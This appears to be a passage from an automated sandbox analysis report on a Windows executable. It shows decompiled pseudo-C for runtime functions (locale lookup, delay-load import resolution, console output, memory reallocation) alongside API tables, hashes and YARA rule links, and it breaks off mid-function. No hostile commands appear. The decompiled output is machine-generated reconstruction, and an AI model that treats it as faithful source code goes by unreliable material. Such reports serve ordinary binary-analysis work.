                                                                                    • EnterCriticalSection.KERNEL32(004BDC10,00000000,0040A8E8,?,?,?,00000000,?,0040B1C8,00000000,0040B227,?,?,00000000,00000000,00000000), ref: 0040A802
                                                                                    • LeaveCriticalSection.KERNEL32(004BDC10,004BDC10,00000000,0040A8E8,?,?,?,00000000,?,0040B1C8,00000000,0040B227,?,?,00000000,00000000), ref: 0040A826
                                                                                    • LeaveCriticalSection.KERNEL32(004BDC10,004BDC10,00000000,0040A8E8,?,?,?,00000000,?,0040B1C8,00000000,0040B227,?,?,00000000,00000000), ref: 0040A835
                                                                                    • IsValidLocale.KERNEL32(00000000,00000002,004BDC10,004BDC10,00000000,0040A8E8,?,?,?,00000000,?,0040B1C8,00000000,0040B227), ref: 0040A847
                                                                                    • EnterCriticalSection.KERNEL32(004BDC10,00000000,00000002,004BDC10,004BDC10,00000000,0040A8E8,?,?,?,00000000,?,0040B1C8,00000000,0040B227), ref: 0040A8A4
                                                                                    • LeaveCriticalSection.KERNEL32(004BDC10,004BDC10,00000000,00000002,004BDC10,004BDC10,00000000,0040A8E8,?,?,?,00000000,?,0040B1C8,00000000,0040B227), ref: 0040A8CD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$Leave$Enter$LocaleValid
                                                                                    • String ID: en-US,en,
                                                                                    • API String ID: 975949045-3579323720
                                                                                    • Opcode ID: e3721d42ea745a9edd8ebaecb4ab5b2828546a05d0e92c0f55165f56426ca85b
                                                                                    • Instruction ID: af4c48ae6f9d4b9345a2e7437780db60bfff4a38cfd5d6d0e3948ff18df55379
                                                                                    • Opcode Fuzzy Hash: e3721d42ea745a9edd8ebaecb4ab5b2828546a05d0e92c0f55165f56426ca85b
                                                                                    • Instruction Fuzzy Hash: 31218461B1031077DA11BB668C03B5E29A89B44705BA0887BB140B32D2EEBD8D52D66F
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0042301C, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 82registryCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 61%
                                                                                    			E0042301C(void* __ebx, void* __esi, void* __eflags) {
				char _v8;
				void* _v12;
				char _v16;
				char _v20;
				intOrPtr* _t21;
				intOrPtr _t61;
				void* _t68;

				_push(__ebx);
				_v20 = 0;
				_v8 = 0;
				_push(_t68);
				_push(0x423116);
				_push( *[fs:eax]);
				 *[fs:eax] = _t68 + 0xfffffff0;
				_t21 = E0040E1A8(__ebx, __esi, GetModuleHandleW(L"kernel32.dll"), L"GetUserDefaultUILanguage");
				if(_t21 == 0) {
					if(E0041FF2C() != 2) {
						if(E00422FF4(0, L"Control Panel\\Desktop\\ResourceLocale", 0x80000001,  &_v12, 1, 0) == 0) {
							E00422FE8();
							RegCloseKey(_v12);
						}
					} else {
						if(E00422FF4(0, L".DEFAULT\\Control Panel\\International", 0x80000003,  &_v12, 1, 0) == 0) {
							E00422FE8();
							RegCloseKey(_v12);
						}
					}
					E0040873C( &_v20, _v8, 0x42322c);
					E00405920(_v20,  &_v16);
					if(_v16 != 0) {
					}
				} else {
					 *_t21();
				}
				_pop(_t61);
				 *[fs:eax] = _t61;
				_push(E0042311D);
				E00407A20( &_v20);
				return E00407A20( &_v8);
			}










                                                                                    0x00423022
                                                                                    0x00423025
                                                                                    0x00423028
                                                                                    0x0042302d
                                                                                    0x0042302e
                                                                                    0x00423033
                                                                                    0x00423036
                                                                                    0x00423049
                                                                                    0x00423050
                                                                                    0x00423063
                                                                                    0x004230b8
                                                                                    0x004230c5
                                                                                    0x004230ce
                                                                                    0x004230ce
                                                                                    0x00423065
                                                                                    0x00423080
                                                                                    0x0042308d
                                                                                    0x00423096
                                                                                    0x00423096
                                                                                    0x00423080
                                                                                    0x004230de
                                                                                    0x004230e9
                                                                                    0x004230f4
                                                                                    0x004230f4
                                                                                    0x00423052
                                                                                    0x00423052
                                                                                    0x00423054
                                                                                    0x004230fa
                                                                                    0x004230fd
                                                                                    0x00423100
                                                                                    0x00423108
                                                                                    0x00423115

                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,00423116), ref: 00423043
                                                                                      • Part of subcall function 0040E1A8: GetProcAddress.KERNEL32(?,00423116), ref: 0040E1D2
                                                                                    • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,00423116), ref: 00423096
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: AddressCloseHandleModuleProc
                                                                                    • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                                                    • API String ID: 4190037839-2401316094
                                                                                    • Opcode ID: 0c53a133d6644a1b94ef3c959f72937b5652b11bdcaf1ce6cf384129006bdbe5
                                                                                    • Instruction ID: 05790bdd6973bc135d390eb6e5b6569f0703c8ea8b4006eead18837270f0a894
                                                                                    • Opcode Fuzzy Hash: 0c53a133d6644a1b94ef3c959f72937b5652b11bdcaf1ce6cf384129006bdbe5
                                                                                    • Instruction Fuzzy Hash: 39217930B00228ABDB10EEB5DD42A9F73F4EB44345FA04477A500E3281DB7CAB41962D
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0040D218, Relevance: 13.8, APIs: 9, Instructions: 258COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 67%
                                                                                    			E0040D218(void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
				long _v8;
				signed int _v12;
				long _v16;
				void* _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				struct HINSTANCE__** _v48;
				CHAR* _v52;
				void _v56;
				long _v60;
				_Unknown_base(*)()* _v64;
				struct HINSTANCE__* _v68;
				CHAR* _v72;
				signed int _v76;
				CHAR* _v80;
				intOrPtr* _v84;
				void* _v88;
				void _v92;
				signed int _t104;
				signed int _t106;
				signed int _t108;
				long _t113;
				intOrPtr* _t119;
				void* _t124;
				void _t126;
				long _t128;
				struct HINSTANCE__* _t142;
				long _t166;
				signed int* _t190;
				_Unknown_base(*)()* _t191;
				void* _t194;
				intOrPtr _t196;

				_push(_a4);
				memcpy( &_v56, 0x4b7c40, 8 << 2);
				_pop(_t194);
				_v56 =  *0x4b7c40;
				_v52 = E0040D6C8( *0x004B7C44);
				_v48 = E0040D6D8( *0x004B7C48);
				_v44 = E0040D6E8( *0x004B7C4C);
				_v40 = E0040D6F8( *0x004B7C50);
				_v36 = E0040D6F8( *0x004B7C54);
				_v32 = E0040D6F8( *0x004B7C58);
				_v28 =  *0x004B7C5C;
				memcpy( &_v92, 0x4b7c60, 9 << 2);
				_t196 = _t194;
				_v88 = 0x4b7c60;
				_v84 = _a8;
				_v80 = _v52;
				if((_v56 & 0x00000001) == 0) {
					_t166 =  *0x4b7c84; // 0x0
					_v8 = _t166;
					_v8 =  &_v92;
					RaiseException(0xc06d0057, 0, 1,  &_v8);
					return 0;
				}
				_t104 = _a8 - _v44;
				_t142 =  *_v48;
				if(_t104 < 0) {
					_t104 = _t104 + 3;
				}
				_v12 = _t104 >> 2;
				_t106 = _v12;
				_t190 = (_t106 << 2) + _v40;
				_t108 = (_t106 & 0xffffff00 | (_t190[0] & 0x00000080) == 0x00000000) & 0x00000001;
				_v76 = _t108;
				if(_t108 == 0) {
					_v72 =  *_t190 & 0x0000ffff;
				} else {
					_v72 = E0040D708( *_t190) + 2;
				}
				_t191 = 0;
				if( *0x4be640 == 0) {
					L10:
					if(_t142 != 0) {
						L25:
						_v68 = _t142;
						if( *0x4be640 != 0) {
							_t191 =  *0x4be640(2,  &_v92);
						}
						if(_t191 != 0) {
							L36:
							if(_t191 == 0) {
								_v60 = GetLastError();
								if( *0x4be644 != 0) {
									_t191 =  *0x4be644(4,  &_v92);
								}
								if(_t191 == 0) {
									_t113 =  *0x4b7c8c; // 0x0
									_v24 = _t113;
									_v24 =  &_v92;
									RaiseException(0xc06d007f, 0, 1,  &_v24);
									_t191 = _v64;
								}
							}
							goto L41;
						} else {
							if( *((intOrPtr*)(_t196 + 0x14)) == 0 ||  *((intOrPtr*)(_t196 + 0x1c)) == 0) {
								L35:
								_t191 = GetProcAddress(_t142, _v72);
								goto L36;
							} else {
								_t119 =  *((intOrPtr*)(_t142 + 0x3c)) + _t142;
								if( *_t119 != 0x4550 ||  *((intOrPtr*)(_t119 + 8)) != _v28 || (( *(_t119 + 0x34) & 0xffffff00 |  *(_t119 + 0x34) == _t142) & 0x00000001) == 0) {
									goto L35;
								} else {
									_t191 =  *((intOrPtr*)(_v36 + _v12 * 4));
									if(_t191 == 0) {
										goto L35;
									}
									L41:
									 *_a8 = _t191;
									goto L42;
								}
							}
						}
					}
					if( *0x4be640 != 0) {
						_t142 =  *0x4be640(1,  &_v92);
					}
					if(_t142 == 0) {
						_t142 = LoadLibraryA(_v80);
					}
					if(_t142 != 0) {
						L20:
						if(_t142 == E0040CBA0(_v48, _t142)) {
							FreeLibrary(_t142);
						} else {
							if( *((intOrPtr*)(_t196 + 0x18)) != 0) {
								_t124 = LocalAlloc(0x40, 8);
								_v20 = _t124;
								if(_t124 != 0) {
									 *((intOrPtr*)(_v20 + 4)) = _t196;
									_t126 =  *0x4b7c3c; // 0x0
									 *_v20 = _t126;
									 *0x4b7c3c = _v20;
								}
							}
						}
						goto L25;
					} else {
						_v60 = GetLastError();
						if( *0x4be644 != 0) {
							_t142 =  *0x4be644(3,  &_v92);
						}
						if(_t142 != 0) {
							goto L20;
						} else {
							_t128 =  *0x4b7c88; // 0x0
							_v16 = _t128;
							_v16 =  &_v92;
							RaiseException(0xc06d007e, 0, 1,  &_v16);
							return _v64;
						}
					}
				} else {
					_t191 =  *0x4be640(0,  &_v92);
					if(_t191 == 0) {
						goto L10;
					} else {
						L42:
						if( *0x4be640 != 0) {
							_v60 = 0;
							_v68 = _t142;
							_v64 = _t191;
							 *0x4be640(5,  &_v92);
						}
						return _t191;
					}
				}
			}







































                                                                                    0x0040d22c
                                                                                    0x0040d232
                                                                                    0x0040d234
                                                                                    0x0040d237
                                                                                    0x0040d244
                                                                                    0x0040d251
                                                                                    0x0040d25e
                                                                                    0x0040d26b
                                                                                    0x0040d278
                                                                                    0x0040d285
                                                                                    0x0040d28e
                                                                                    0x0040d29c
                                                                                    0x0040d29e
                                                                                    0x0040d29f
                                                                                    0x0040d2a5
                                                                                    0x0040d2ab
                                                                                    0x0040d2b2
                                                                                    0x0040d2b4
                                                                                    0x0040d2ba
                                                                                    0x0040d2c0
                                                                                    0x0040d2d0
                                                                                    0x00000000
                                                                                    0x0040d2d5
                                                                                    0x0040d2e2
                                                                                    0x0040d2e7
                                                                                    0x0040d2e9
                                                                                    0x0040d2eb
                                                                                    0x0040d2eb
                                                                                    0x0040d2f1
                                                                                    0x0040d2f4
                                                                                    0x0040d2fc
                                                                                    0x0040d306
                                                                                    0x0040d309
                                                                                    0x0040d30e
                                                                                    0x0040d329
                                                                                    0x0040d310
                                                                                    0x0040d31c
                                                                                    0x0040d31c
                                                                                    0x0040d32c
                                                                                    0x0040d335
                                                                                    0x0040d34e
                                                                                    0x0040d350
                                                                                    0x0040d412
                                                                                    0x0040d412
                                                                                    0x0040d41c
                                                                                    0x0040d42a
                                                                                    0x0040d42a
                                                                                    0x0040d42e
                                                                                    0x0040d47b
                                                                                    0x0040d47d
                                                                                    0x0040d484
                                                                                    0x0040d48e
                                                                                    0x0040d49c
                                                                                    0x0040d49c
                                                                                    0x0040d4a0
                                                                                    0x0040d4a2
                                                                                    0x0040d4a7
                                                                                    0x0040d4ad
                                                                                    0x0040d4bd
                                                                                    0x0040d4c2
                                                                                    0x0040d4c2
                                                                                    0x0040d4a0
                                                                                    0x00000000
                                                                                    0x0040d430
                                                                                    0x0040d434
                                                                                    0x0040d46f
                                                                                    0x0040d479
                                                                                    0x00000000
                                                                                    0x0040d43c
                                                                                    0x0040d43f
                                                                                    0x0040d447
                                                                                    0x00000000
                                                                                    0x0040d460
                                                                                    0x0040d466
                                                                                    0x0040d46b
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040d4c5
                                                                                    0x0040d4c8
                                                                                    0x00000000
                                                                                    0x0040d4c8
                                                                                    0x0040d447
                                                                                    0x0040d434
                                                                                    0x0040d42e
                                                                                    0x0040d35d
                                                                                    0x0040d36b
                                                                                    0x0040d36b
                                                                                    0x0040d36f
                                                                                    0x0040d37a
                                                                                    0x0040d37a
                                                                                    0x0040d37e
                                                                                    0x0040d3cb
                                                                                    0x0040d3d7
                                                                                    0x0040d40d
                                                                                    0x0040d3d9
                                                                                    0x0040d3dd
                                                                                    0x0040d3e3
                                                                                    0x0040d3e8
                                                                                    0x0040d3ed
                                                                                    0x0040d3f4
                                                                                    0x0040d3fa
                                                                                    0x0040d3ff
                                                                                    0x0040d404
                                                                                    0x0040d404
                                                                                    0x0040d3ed
                                                                                    0x0040d3dd
                                                                                    0x00000000
                                                                                    0x0040d380
                                                                                    0x0040d385
                                                                                    0x0040d38f
                                                                                    0x0040d39d
                                                                                    0x0040d39d
                                                                                    0x0040d3a1
                                                                                    0x00000000
                                                                                    0x0040d3a3
                                                                                    0x0040d3a3
                                                                                    0x0040d3a8
                                                                                    0x0040d3ae
                                                                                    0x0040d3be
                                                                                    0x00000000
                                                                                    0x0040d3c3
                                                                                    0x0040d3a1
                                                                                    0x0040d337
                                                                                    0x0040d343
                                                                                    0x0040d347
                                                                                    0x00000000
                                                                                    0x0040d349
                                                                                    0x0040d4ca
                                                                                    0x0040d4d1
                                                                                    0x0040d4d5
                                                                                    0x0040d4d8
                                                                                    0x0040d4db
                                                                                    0x0040d4e4
                                                                                    0x0040d4e4
                                                                                    0x00000000
                                                                                    0x0040d4ea
                                                                                    0x0040d347

                                                                                    APIs
                                                                                    • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0040D2D0
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: ExceptionRaise
                                                                                    • String ID:
                                                                                    • API String ID: 3997070919-0
                                                                                    • Opcode ID: 4fdbadfbff537c598349848257c7330453a14fb024132e1a583ffc8385a63ee1
                                                                                    • Instruction ID: 6bdc8742f8c12d3c05e6aa795b4e0fa0c425ed74332de7fca684440f38d882f1
                                                                                    • Opcode Fuzzy Hash: 4fdbadfbff537c598349848257c7330453a14fb024132e1a583ffc8385a63ee1
                                                                                    • Instruction Fuzzy Hash: 7CA16F75D002089FDB14DFE9D881BAEB7B5BB88300F14423AE505B73C1DB78A949CB59
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004047B0, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51fileCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 72%
                                                                                    			E004047B0(int __eax, void* __ecx, void* __edx) {
				long _v12;
				int _t4;
				long _t7;
				void* _t11;
				long _t12;
				void* _t13;
				long _t18;

				_t4 = __eax;
				_t24 = __edx;
				_t20 = __eax;
				if( *0x4bb058 == 0) {
					_push(0x2010);
					_push(__edx);
					_push(__eax);
					_push(0);
					L00403780();
				} else {
					_t7 = E00407EF0(__edx);
					WriteFile(GetStdHandle(0xfffffff4), _t24, _t7,  &_v12, 0);
					_t11 =  *0x4b7078; // 0x403920
					_t12 = E00407EF0(_t11);
					_t13 =  *0x4b7078; // 0x403920
					WriteFile(GetStdHandle(0xfffffff4), _t13, _t12,  &_v12, 0);
					_t18 = E00407EF0(_t20);
					_t4 = WriteFile(GetStdHandle(0xfffffff4), _t20, _t18,  &_v12, 0);
				}
				return _t4;
			}










                                                                                    0x004047b0
                                                                                    0x004047b3
                                                                                    0x004047b5
                                                                                    0x004047be
                                                                                    0x00404821
                                                                                    0x00404826
                                                                                    0x00404827
                                                                                    0x00404828
                                                                                    0x0040482a
                                                                                    0x004047c0
                                                                                    0x004047c9
                                                                                    0x004047d8
                                                                                    0x004047e4
                                                                                    0x004047e9
                                                                                    0x004047ef
                                                                                    0x004047fd
                                                                                    0x0040480b
                                                                                    0x0040481a
                                                                                    0x0040481a
                                                                                    0x00404832

                                                                                    APIs
                                                                                    • GetStdHandle.KERNEL32(000000F4,00403924,00000000,?,00000000,?,?,00000000,0040515B), ref: 004047D2
                                                                                    • WriteFile.KERNEL32(00000000,000000F4,00403924,00000000,?,00000000,?,?,00000000,0040515B), ref: 004047D8
                                                                                    • GetStdHandle.KERNEL32(000000F4,00403920,00000000,?,00000000,00000000,000000F4,00403924,00000000,?,00000000,?,?,00000000,0040515B), ref: 004047F7
                                                                                    • WriteFile.KERNEL32(00000000,000000F4,00403920,00000000,?,00000000,00000000,000000F4,00403924,00000000,?,00000000,?,?,00000000,0040515B), ref: 004047FD
                                                                                    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,00000000,000000F4,00403920,00000000,?,00000000,00000000,000000F4,00403924,00000000,?), ref: 00404814
                                                                                    • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,00000000,000000F4,00403920,00000000,?,00000000,00000000,000000F4,00403924,00000000), ref: 0040481A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: FileHandleWrite
                                                                                    • String ID: 9@
                                                                                    • API String ID: 3320372497-3209974744
                                                                                    • Opcode ID: 5f8d133322f34133c732956f1222a9d0eafcb790ac979970e9ef56a2ae19cd1b
                                                                                    • Instruction ID: 9b3b4e35e49a927b8991458b20a1a8ec0ccf5b925403b1971dfbe1b0899ab5f0
                                                                                    • Opcode Fuzzy Hash: 5f8d133322f34133c732956f1222a9d0eafcb790ac979970e9ef56a2ae19cd1b
                                                                                    • Instruction Fuzzy Hash: 2001AEE25492103DE110F7A69C85F57168C8B4472AF10467F7218F35D2C9395D44927E
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0041F0F4, Relevance: 12.1, APIs: 8, Instructions: 97filewindowCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 62%
                                                                                    			E0041F0F4(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				char* _v8;
				long _v12;
				short _v140;
				short _v2188;
				void* _t15;
				char* _t17;
				intOrPtr _t19;
				intOrPtr _t30;
				long _t48;
				intOrPtr _t56;
				intOrPtr _t57;
				int _t61;
				void* _t64;

				_push(__ebx);
				_push(__esi);
				_v8 = 0;
				_push(_t64);
				_push(0x41f219);
				_push( *[fs:ecx]);
				 *[fs:ecx] = _t64 + 0xfffff778;
				_t61 = E0041EEFC(_t15, __ebx,  &_v2188, __edx, __edi, __esi, 0x400);
				_t17 =  *0x4ba6c0; // 0x4bb058
				if( *_t17 == 0) {
					_t19 =  *0x4ba4f8; // 0x40e710
					_t11 = _t19 + 4; // 0xffed
					LoadStringW(E00409FF0( *0x4be634),  *_t11,  &_v140, 0x40);
					MessageBoxW(0,  &_v2188,  &_v140, 0x2010);
				} else {
					_t30 =  *0x4ba524; // 0x4bb340
					E00405564(E00405820(_t30));
					_t48 = WideCharToMultiByte(1, 0,  &_v2188, _t61, 0, 0, 0, 0);
					_push(_t48);
					E00409C00();
					WideCharToMultiByte(1, 0,  &_v2188, _t61, _v8, _t48, 0, 0);
					WriteFile(GetStdHandle(0xfffffff4), _v8, _t48,  &_v12, 0);
					WriteFile(GetStdHandle(0xfffffff4), 0x41f234, 2,  &_v12, 0);
				}
				_pop(_t56);
				 *[fs:eax] = _t56;
				_push(0x41f220);
				_t57 =  *0x41f0c4; // 0x41f0c8
				return E00409D24( &_v8, _t57);
			}
















                                                                                    0x0041f0fd
                                                                                    0x0041f0fe
                                                                                    0x0041f101
                                                                                    0x0041f106
                                                                                    0x0041f107
                                                                                    0x0041f10c
                                                                                    0x0041f10f
                                                                                    0x0041f122
                                                                                    0x0041f124
                                                                                    0x0041f12c
                                                                                    0x0041f1ca
                                                                                    0x0041f1cf
                                                                                    0x0041f1de
                                                                                    0x0041f1f8
                                                                                    0x0041f132
                                                                                    0x0041f132
                                                                                    0x0041f13c
                                                                                    0x0041f15a
                                                                                    0x0041f15c
                                                                                    0x0041f16b
                                                                                    0x0041f188
                                                                                    0x0041f1a0
                                                                                    0x0041f1ba
                                                                                    0x0041f1ba
                                                                                    0x0041f1ff
                                                                                    0x0041f202
                                                                                    0x0041f205
                                                                                    0x0041f20d
                                                                                    0x0041f218

                                                                                    APIs
                                                                                      • Part of subcall function 0041EEFC: VirtualQuery.KERNEL32(?,?,0000001C,00000000,0041F0A8), ref: 0041EF2F
                                                                                      • Part of subcall function 0041EEFC: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 0041EF53
                                                                                      • Part of subcall function 0041EEFC: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 0041EF6E
                                                                                      • Part of subcall function 0041EEFC: LoadStringW.USER32(00000000,0000FFEC,?,00000100), ref: 0041F009
                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,?,00000000,00000000,00000000,00000000,00000000,00000400,00000000,0041F219), ref: 0041F155
                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0041F188
                                                                                    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0041F19A
                                                                                    • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0041F1A0
                                                                                    • GetStdHandle.KERNEL32(000000F4,0041F234,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?), ref: 0041F1B4
                                                                                    • WriteFile.KERNEL32(00000000,000000F4,0041F234,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000), ref: 0041F1BA
                                                                                    • LoadStringW.USER32(00000000,0000FFED,?,00000040), ref: 0041F1DE
                                                                                    • MessageBoxW.USER32(00000000,?,?,00002010), ref: 0041F1F8
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: File$ByteCharHandleLoadModuleMultiNameStringWideWrite$MessageQueryVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 135118572-0
                                                                                    • Opcode ID: 7bf27a680bd44ec5315003c7bd75f7b580991028cc1534cfff61cb99441fed85
                                                                                    • Instruction ID: 441773961034998e17761d3334fa1b60ae8bad0ad03d42d5622a75f3c8f76c28
                                                                                    • Opcode Fuzzy Hash: 7bf27a680bd44ec5315003c7bd75f7b580991028cc1534cfff61cb99441fed85
                                                                                    • Instruction Fuzzy Hash: 7D31CF75640204BFE714E796CC42FDA77ACEB08704F9044BABA04F71D2DA786E548B6D
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00404464, Relevance: 10.9, APIs: 7, Instructions: 406COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 88%
                                                                                    			E00404464(signed int __eax, intOrPtr __edx, void* __edi) {
				signed int __ebx;
				void* __esi;
				signed int _t69;
				signed int _t78;
				signed int _t93;
				long _t94;
				void* _t100;
				signed int _t102;
				signed int _t109;
				signed int _t115;
				signed int _t123;
				signed int _t129;
				void* _t131;
				signed int _t140;
				unsigned int _t148;
				signed int _t150;
				long _t152;
				signed int _t156;
				intOrPtr _t161;
				signed int _t166;
				signed int _t170;
				unsigned int _t171;
				intOrPtr _t174;
				intOrPtr _t192;
				signed int _t195;
				signed int _t196;
				signed int _t197;
				void* _t205;
				unsigned int _t207;
				intOrPtr _t213;
				void* _t225;
				intOrPtr _t227;
				void* _t228;
				signed int _t230;
				void* _t232;
				signed int _t233;
				signed int _t234;
				signed int _t238;
				signed int _t241;
				void* _t243;
				intOrPtr* _t244;

				_t176 = __edx;
				_t66 = __eax;
				_t166 =  *(__eax - 4);
				_t217 = __eax;
				if((_t166 & 0x00000007) != 0) {
					__eflags = _t166 & 0x00000005;
					if((_t166 & 0x00000005) != 0) {
						_pop(_t217);
						_pop(_t145);
						__eflags = _t166 & 0x00000003;
						if((_t166 & 0x00000003) == 0) {
							_push(_t145);
							_push(__eax);
							_push(__edi);
							_push(_t225);
							_t244 = _t243 + 0xffffffe0;
							_t218 = __edx;
							_t202 = __eax;
							_t69 =  *(__eax - 4);
							_t148 = (0xfffffff0 & _t69) - 0x14;
							if(0xfffffff0 >= __edx) {
								__eflags = __edx - _t148 >> 1;
								if(__edx < _t148 >> 1) {
									_t150 = E00403EE8(__edx);
									__eflags = _t150;
									if(_t150 != 0) {
										__eflags = _t218 - 0x40a2c;
										if(_t218 > 0x40a2c) {
											_t78 = _t202 - 0x10;
											__eflags = _t78;
											 *((intOrPtr*)(_t78 + 8)) = _t218;
										}
										E00403AA4(_t202, _t218, _t150);
										E0040426C(_t202, _t202, _t225);
									}
								} else {
									_t150 = __eax;
									 *((intOrPtr*)(__eax - 0x10 + 8)) = __edx;
								}
							} else {
								if(0xfffffff0 <= __edx) {
									_t227 = __edx;
								} else {
									_t227 = 0xbadb9d;
								}
								 *_t244 = _t202 - 0x10 + (_t69 & 0xfffffff0);
								VirtualQuery( *(_t244 + 8), _t244 + 8, 0x1c);
								if( *((intOrPtr*)(_t244 + 0x14)) != 0x10000) {
									L12:
									_t150 = E00403EE8(_t227);
									__eflags = _t150;
									if(_t150 != 0) {
										__eflags = _t227 - 0x40a2c;
										if(_t227 > 0x40a2c) {
											_t93 = _t150 - 0x10;
											__eflags = _t93;
											 *((intOrPtr*)(_t93 + 8)) = _t218;
										}
										E00403A74(_t202,  *((intOrPtr*)(_t202 - 0x10 + 8)), _t150);
										E0040426C(_t202, _t202, _t227);
									}
								} else {
									 *(_t244 + 0x10) =  *(_t244 + 0x10) & 0xffff0000;
									_t94 =  *(_t244 + 0x10);
									if(_t218 - _t148 >= _t94) {
										goto L12;
									} else {
										_t152 = _t227 - _t148 + 0x00010000 - 0x00000001 & 0xffff0000;
										if(_t94 < _t152) {
											_t152 = _t94;
										}
										if(VirtualAlloc( *(_t244 + 0xc), _t152, 0x2000, 4) == 0 || VirtualAlloc( *(_t244 + 0xc), _t152, 0x1000, 4) == 0) {
											goto L12;
										} else {
											_t100 = _t202 - 0x10;
											 *((intOrPtr*)(_t100 + 8)) = _t218;
											 *(_t100 + 0xc) = _t152 +  *(_t100 + 0xc) | 0x00000008;
											_t150 = _t202;
										}
									}
								}
							}
							return _t150;
						} else {
							__eflags = 0;
							return 0;
						}
					} else {
						_t170 = _t166 & 0xfffffff0;
						_push(__edi);
						_t205 = _t170 + __eax;
